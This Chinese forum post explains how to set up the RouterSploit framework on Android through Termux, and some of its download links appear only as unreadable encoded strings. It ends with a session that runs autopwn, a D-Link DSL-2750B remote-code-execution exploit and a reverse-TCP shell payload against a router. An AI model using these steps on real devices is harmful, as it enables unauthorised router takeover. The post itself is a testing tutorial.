-
-
[分享] 在Android 手机上搭建RouterSploit 测试环境(无需root)
-
发表于:
2018-10-21 18:39
11679
-
[分享] 在Android 手机上搭建RouterSploit 测试环境(无需root)
最近在Android手机上搭建了RouterSploit 攻击测试环境,这样就可以方便的测试一些AP了。(提示,测试公开的WiFi AP之前,请征得对方的同意哦。)
RouterSploit 开始是一个专门针对路由器的测试工具,后来它的目标貌似转变成了能够攻击嵌入式设备的框架。
在Android手机上是利用termux这个工具来操作的。
termux默认是安装了python3的,因此,对于最新的
RouterSploit 是刚好支持的。如果想要支持python2的工具,那么可以按照这个网址的提示进行安装。
这个基本快捷键是这样的:
(注意:网上的资料说tab快捷键是 音量键+, D。然而并不是。 试了好多遍)
- tab命令补全 (volum +, and t)
- 展示所有支持的快捷键 (volum +, and q)
- 光标的左/右移动(volum +, and a/d)
- 前一个/后一个 commands (volum +, and w/s)
一些预备的库需要提前安装:
pkg update
pkg install git wget clang
apt install libffi libffi-dev
安装用于
cryptography的
wget7ecK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1k6i4y4%4L8%4u0V1i4K6u0r3M7$3S2W2L8r3I4U0L8$3c8W2i4K6g2X3N6r3!0G2L8s2y4Q4x3V1k6J5j5i4N6Q4x3V1k6E0j5i4y4@1k6i4u0Q4x3V1k6m8L8X3c8J5L8$3W2V1i4K6g2X3M7X3!0#2N6r3g2J5M7%4m8D9L8$3W2@1i4K6u0r3L8%4m8W2L8Y4y4K6L8q4)9#2k6U0q4Q4x3X3f1I4i4K6u0W2x3g2)9J5k6o6u0Q4y4h3k6S2j5i4u0U0K9o6j5@1i4K6u0W2k6r3g2T1i4K6u0W2k6%4Z5`.
wgete6cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1k6i4y4%4L8%4u0V1i4K6u0r3M7$3S2W2L8r3I4U0L8$3c8W2i4K6g2X3N6r3!0G2L8s2y4Q4x3V1k6J5j5i4N6Q4x3V1k6E0j5i4y4@1k6i4u0Q4x3V1k6m8L8X3c8J5L8$3W2V1i4K6g2X3M7X3!0#2N6r3g2J5M7%4m8D9L8$3W2@1i4K6u0r3L8%4m8W2L8Y4y4K6L8q4)9J5k6r3c8W2N6W2)9#2k6U0q4Q4x3X3f1I4i4K6u0W2x3g2)9J5k6o6u0Q4y4h3k6S2j5i4u0U0K9o6j5@1i4K6u0W2k6r3g2T1i4K6u0W2k6%4Z5`.
wget537K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1k6i4y4%4L8%4u0V1i4K6u0r3M7$3S2W2L8r3I4U0L8$3c8W2i4K6g2X3N6r3!0G2L8s2y4Q4x3V1k6J5j5i4N6Q4x3V1k6E0j5i4y4@1k6i4u0Q4x3V1k6m8L8X3c8J5L8$3W2V1i4K6g2X3M7X3!0#2N6r3g2J5M7%4m8D9L8$3W2@1i4K6u0r3L8%4m8W2L8Y4y4K6L8q4)9J5k6s2c8G2L8$3I4Q4y4h3j5I4i4K6u0W2x3g2)9J5k6e0q4Q4x3X3b7J5i4K6g2X3j5h3q4J5j5$3R3$3y4q4)9J5k6h3c8W2j5W2)9J5k6h3N6*7
gunzip openssl_1.1.1-2_arm.deb.gz
gunzip openssl-dev_1.1.1-2_arm.deb.gz
gunzip openssl-tool_1.1.1-2_arm.deb.gz
dpkg -i openssl_1.1.1-2_arm.deb
dpkg -i openssl-dev_1.1.1-2_arm.deb
dpkg -i openssl-tool_1.1.1-2_arm.deb
这里的默认安装会有问题,因此需要按照老版本的上述openssl。
接着就是clone
RouterSploit .并且安装一些必要的库文件了以及正式安装
RouterSploit
git clonedf3K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1K9s2u0W2j5i4b7&6i4K6u0r3M7X3!0#2N6r3g2J5M7%4m8D9L8$3W2@1
cd routersploit
pip install -r requirements.txt
这样就完成了安装。
网络如果不好可能会出现安装失误,多安装几次就好。
接下来就可以按照这里面的方式,最后的几个命令来测试目标的AP了。
python rsf.py
use scanner/autopwn
set target 192.168.1.1
rsf (AutoPwn) > use exploits/routers/dlink/dsl_2750b_rce
rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link DSL-2750B RCE) > check
[+] Target is vulnerable
rsf (D-Link DSL-2750B RCE) > run
cmd > show payloads
cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options
cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.10
cmd (MIPSBE Reverse TCP) > run
觉得好的同学请多多star, 多多fork, :)
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2018-11-7 15:22
被二当家a编辑
,原因: